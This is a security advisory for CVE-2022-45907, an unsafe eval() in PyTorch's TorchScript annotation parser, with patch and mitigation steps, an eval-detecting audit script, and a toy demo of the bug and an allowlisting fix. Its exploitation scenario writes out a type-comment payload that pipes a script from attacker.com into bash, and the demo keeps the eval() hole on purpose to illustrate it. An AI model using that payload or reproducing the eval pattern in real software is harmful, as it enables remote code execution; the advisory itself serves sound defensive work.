CVE-2022-45907: PyTorch: RCE via unsafe eval in JIT annotations
Critical. Public PoC available. Any PyTorch deployment that scripts or loads untrusted model code is exposed to remote code execution with no authentication: the TorchScript JIT's annotation parser passes attacker-controlled type annotation text to eval(). This includes model serving APIs, MLOps pipelines, and shared training infrastructure that run third-party model code. Patch to commit 767f6aa or later. Until then, treat every PyTorch process that handles external model inputs as a high-privilege attack surface.
Risk Assessment
Critical. CVSS 9.8 (network vector, no privileges, no user interaction). The caveat behind that score: the eval() fires only when the victim process parses a type annotation the attacker controls, so the attacker has to get a crafted "# type:" line into code that PyTorch's JIT scripts, typically by shipping it alongside a model. PyTorch is the dominant ML framework in both research and production, so the population of processes that do exactly that is very large. Crafting the payload needs no ML knowledge; it is an ordinary Python expression placed in a type comment. Unpatched model serving endpoints and collaborative ML platforms (Jupyter, MLflow, Weights & Biases integrations) that execute third-party model code are the highest-risk exposure.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| pytorch (torch) | pip | before trunk/89695 (no release range recorded on this page) | commit 767f6aa (PR 89695) |
If your torch build predates that commit, you are affected. The quickest check: confirm whether torch/jit/annotations.py in your installed package still passes the annotation string straight to eval() from parse_type_line without vetting it first.
Recommended Action
1. Patch: apply commit 767f6aa49fe20a2766b9843d01e3b7f7793df6a3 or upgrade to a PyTorch build that includes PR 89695.
2. Workaround: until patched, do not script or load untrusted PyTorch model code; enforce allowlisting of model sources in MLOps pipelines.
3. Isolate: run model loading and inference in sandboxed containers with minimal permissions and no network egress.
4. Detect: alert on unexpected subprocess creation, outbound connections, or file writes originating from PyTorch inference or training processes.
5. Audit: inventory every system that loads external .pt/.pth files or TorchScript definitions; prioritize public-facing model APIs.
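The Patch and Audit steps both come down to one question per host: does the installed torch/jit/annotations.py still hand annotation text to eval() from parse_type_line? The following is an added audit helper, not PyTorch's own tooling: it parses a Python source file, reports every bare eval()/exec() call with the innermost function that contains it, and can run that check against the torch.jit.annotations module of whatever torch is installed. The two SKETCH strings are constructed stand-ins for the pre-fix and post-fix shape of the module, not copies of the real file; the helper name _resolve_annotation in the hardened sketch is hypothetical.

```python
"""Audit helper for CVE-2022-45907 (added example, not PyTorch's own tooling).

It locates every bare eval()/exec() call in a Python source file and reports
the innermost function containing it, so you can see whether the installed
torch/jit/annotations.py still evaluates annotation text straight from
parse_type_line. The two SKETCH strings below are constructed stand-ins for
the pre-fix and post-fix shape of that module, not copies of the real file.
"""
import ast
from typing import List, Optional, Tuple

# Constructed sketch of the vulnerable shape: annotation strings go straight to eval().
VULNERABLE_SKETCH = '''
def parse_type_line(type_line, rcb, loc):
    arg_ann_str, ret_ann_str = split_type_line(type_line)
    arg_ann = eval(arg_ann_str, {}, EvalEnv(rcb))
    ret_ann = eval(ret_ann_str, {}, EvalEnv(rcb))
    return arg_ann, ret_ann
'''

# Constructed sketch of a fixed shape: the text is resolved by a helper that never calls eval().
# (_resolve_annotation is a hypothetical name used only in this sketch.)
HARDENED_SKETCH = '''
def _resolve_annotation(text, rcb):
    return rcb.resolve_type_expression(text)

def parse_type_line(type_line, rcb, loc):
    arg_ann_str, ret_ann_str = split_type_line(type_line)
    return _resolve_annotation(arg_ann_str, rcb), _resolve_annotation(ret_ann_str, rcb)
'''


class _EvalFinder(ast.NodeVisitor):
    """Collect (enclosing function, line) for each call to the builtin eval or exec."""

    def __init__(self) -> None:
        self.stack: List[str] = []  # names of the functions currently being walked
        self.hits: List[Tuple[str, int]] = []

    def _visit_function(self, node) -> None:
        self.stack.append(node.name)
        self.generic_visit(node)
        self.stack.pop()

    visit_FunctionDef = _visit_function
    visit_AsyncFunctionDef = _visit_function

    def visit_Call(self, node: ast.Call) -> None:
        # Only a bare name `eval(...)` / `exec(...)` counts; EvalEnv(...) or obj.eval(...) do not.
        if isinstance(node.func, ast.Name) and node.func.id in ("eval", "exec"):
            owner = self.stack[-1] if self.stack else "<module>"
            self.hits.append((owner, node.lineno))
        self.generic_visit(node)


def eval_call_sites(source: str) -> List[Tuple[str, int]]:
    """Return every bare eval()/exec() call in `source` as (function name, line number)."""
    finder = _EvalFinder()
    finder.visit(ast.parse(source))
    return finder.hits


def parse_type_line_uses_eval(source: str) -> bool:
    """True if parse_type_line itself hands a string to eval()/exec(): the pre-fix shape."""
    return any(owner == "parse_type_line" for owner, _ in eval_call_sites(source))


def scan_installed_torch() -> Optional[List[Tuple[str, int]]]:
    """Scan the torch.jit.annotations module of the installed torch, if there is one."""
    try:
        import torch.jit.annotations as annotations  # heavy import; skipped when torch is absent
    except ImportError:
        return None
    with open(annotations.__file__, encoding="utf-8") as fh:
        return eval_call_sites(fh.read())


if __name__ == "__main__":
    for name, sketch in (("vulnerable sketch", VULNERABLE_SKETCH), ("hardened sketch", HARDENED_SKETCH)):
        print(name, eval_call_sites(sketch), "parse_type_line uses eval:", parse_type_line_uses_eval(sketch))
    installed = scan_installed_torch()
    if installed is None:
        print("torch not installed; nothing to scan")
    else:
        print("installed torch.jit.annotations eval/exec call sites:", installed)
```

Treat a hit inside parse_type_line as the pre-fix shape and a hit anywhere else in the module as something to review by hand against the fix commit rather than as an automatic pass: the scanner reports where string evaluation happens, it does not judge whether the string was vetted first.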
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2022-45907?
An unsafe eval() in torch.jit.annotations.parse_type_line, the function that parses "# type: (args) -> ret" annotation comments for the TorchScript JIT, in PyTorch before trunk/89695. Annotation text the attacker controls is evaluated as Python, so scripting untrusted model code yields arbitrary code execution in that process. It carries a CVSS 9.8 and a public PoC; patch to commit 767f6aa or later.
Is CVE-2022-45907 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2022-45907, increasing the risk of exploitation.
How to fix CVE-2022-45907?
Apply commit 767f6aa49fe20a2766b9843d01e3b7f7793df6a3 or upgrade to a PyTorch build that includes PR 89695. Until that is done: stop scripting or loading untrusted model code and allowlist model sources in MLOps pipelines; run model loading and inference in sandboxed containers with minimal permissions and no egress; alert on unexpected subprocesses, outbound connections, or file writes from PyTorch processes; and inventory every system that loads external .pt/.pth files or TorchScript definitions, starting with public-facing model APIs. The Recommended Action section above spells out these five steps.
What systems are affected by CVE-2022-45907?
This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, model registries, MLOps pipelines, inference APIs.
What is the CVSS score for CVE-2022-45907?
CVE-2022-45907 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.79%.
Technical Details
NVD Description
In PyTorch before trunk/89695, torch.jit.annotations.parse_type_line can cause arbitrary code execution because eval is used unsafely.
Exploitation Scenario
An adversary publishes a model to a public model hub (e.g., Hugging Face) or injects it into a shared model registry, together with the Python module code that defines it. That code carries a crafted type comment, for example a line of the form
# type: (__import__("os").system("curl attacker.com/shell.sh | bash")) -> Tensor
When a downstream pipeline scripts the module with torch.jit.script for inference or fine-tuning, parse_type_line hands the annotation text to eval(), and the payload runs with the OS-level privileges of the service. Beyond getting the victim to script the code, which is the normal way of consuming such a model, no authentication, user interaction, or ML expertise is required; the exploit is effectively a supply chain attack against every consumer of the poisoned artifact. Note the boundary of this CVE: the sink is the JIT annotation parser, so the trigger is attacker-controlled annotation text reaching torch.jit, not the deserialization performed by torch.load, which is a separate risk.
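To make the bug class concrete, here is an added toy model of the parser, not PyTorch's code: a "# type: (args) -> ret" line is parsed first by handing the annotation text to eval(), as the vulnerable parse_type_line did, and then by an allowlisting resolver that walks the expression's AST and accepts only names, None, tuples and subscripts. The placeholder Tensor class, the name table in make_type_env, and the sample lines are all constructed for this demo; the hostile line uses os.getpid() as a harmless stand-in for the os.system(...) payload from the scenario above, so the block is safe to run.

```python
"""Toy model of the CVE-2022-45907 bug class (added example, not PyTorch's code).

A '# type: (args) -> ret' comment is parsed two ways: first by handing the
annotation text to eval(), as the vulnerable parse_type_line did, then by an
allowlisting resolver that walks the expression's AST and accepts only the
shapes a type annotation legitimately needs. Type names, the placeholder
Tensor class and the sample lines below are all constructed for this demo.
"""
import ast
from typing import Any, Dict, List, Optional, Tuple


class Tensor:
    """Stand-in for torch.Tensor so the example runs without torch installed."""


def make_type_env() -> Dict[str, Any]:
    """Names an annotation may refer to (the analogue of the JIT's resolution callback)."""
    return {"Tensor": Tensor, "int": int, "float": float, "bool": bool,
            "List": List, "Optional": Optional, "Tuple": Tuple}


# Constructed sample type lines. The hostile one uses os.getpid() as a harmless
# stand-in for the os.system(...) payload an attacker would actually place here.
BENIGN_LINE = "# type: (Tensor, int) -> Tensor"
GENERIC_LINE = "# type: (List[Tensor], Optional[int]) -> Tuple[Tensor, int]"
HOSTILE_LINE = "# type: (__import__('os').getpid(),) -> Tensor"


def split_type_line(type_line: str) -> Tuple[str, str]:
    """Split '# type: (args) -> ret' into the argument text and the return text."""
    body = type_line.split("# type:", 1)[1]
    arg_text, ret_text = body.rsplit("->", 1)
    return arg_text.strip(), ret_text.strip()


def vulnerable_parse_type_line(type_line: str, env: Dict[str, Any]) -> Tuple[Any, Any]:
    """The vulnerable pattern: attacker-influenced annotation text goes straight to eval().

    eval() exposes the full builtins namespace (including __import__) to that
    text, so any Python expression runs with the privileges of this process.
    """
    arg_text, ret_text = split_type_line(type_line)
    return eval(arg_text, dict(env)), eval(ret_text, dict(env))


def _resolve(node: ast.AST, env: Dict[str, Any]) -> Any:
    """Allowlist walk: names from env, None, tuples and subscripts; everything else is rejected."""
    if isinstance(node, ast.Name):
        if node.id not in env:
            raise TypeError(f"unknown type name {node.id!r}")
        return env[node.id]
    if isinstance(node, ast.Constant) and node.value is None:
        return None
    if isinstance(node, ast.Tuple):
        return tuple(_resolve(elt, env) for elt in node.elts)
    if isinstance(node, ast.Subscript):
        index = node.slice
        if hasattr(ast, "Index") and isinstance(index, ast.Index):  # Python 3.8 wraps the slice
            index = index.value
        return _resolve(node.value, env)[_resolve(index, env)]
    # ast.Call, ast.Attribute, ast.Lambda, ast.BinOp, ... never belong in a type annotation.
    raise TypeError(f"disallowed syntax in type annotation: {type(node).__name__}")


def safe_eval_type(text: str, env: Dict[str, Any]) -> Any:
    """Resolve a type expression without ever calling eval() on attacker-controlled text."""
    return _resolve(ast.parse(text, mode="eval").body, env)


def hardened_parse_type_line(type_line: str, env: Dict[str, Any]) -> Tuple[Any, Any]:
    """Same contract as the vulnerable version, but a hostile line raises TypeError."""
    arg_text, ret_text = split_type_line(type_line)
    return safe_eval_type(arg_text, env), safe_eval_type(ret_text, env)


def demo() -> Dict[str, str]:
    """Run both parsers over the samples and summarize what happened."""
    out: Dict[str, str] = {}
    out["vulnerable_benign"] = repr(vulnerable_parse_type_line(BENIGN_LINE, make_type_env()))
    pid = vulnerable_parse_type_line(HOSTILE_LINE, make_type_env())[0][0]
    out["vulnerable_hostile"] = f"executed: __import__('os').getpid() returned {pid}"
    out["hardened_benign"] = repr(hardened_parse_type_line(BENIGN_LINE, make_type_env()))
    try:
        hardened_parse_type_line(HOSTILE_LINE, make_type_env())
        out["hardened_hostile"] = "accepted"
    except TypeError as exc:
        out["hardened_hostile"] = f"rejected: {exc}"
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:18} {value}")
```

The design point is the allowlist: rather than scanning the expression for known-bad constructs such as calls, the resolver enumerates the few node types a type annotation can legitimately contain and refuses anything else, so new ways of smuggling execution into an expression are rejected by default rather than missed.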
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
References
- github.com/pytorch/pytorch/commit/767f6aa49fe20a2766b9843d01e3b7f7793df6a3 Patch 3rd Party
- github.com/pytorch/pytorch/issues/88868 Exploit Issue Patch 3rd Party
- github.com/mangoding71/AGNC Exploit
Related Vulnerabilities
- CVE-2024-5452 (9.8) pytorch-lightning: RCE via deepdiff Delta deserialization [same package: torch]
- CVE-2024-35198 (9.8) TorchServe: URL bypass enables arbitrary model loading [same package: torch]
- CVE-2023-43654 (9.8) TorchServe: SSRF + RCE via unrestricted model URL loading [same package: torch]
- CVE-2022-0845 (9.8) pytorch-lightning: code injection enables full RCE [same package: torch]
- CVE-2024-48063 (9.8) PyTorch: RCE via RemoteModule deserialization [same package: torch]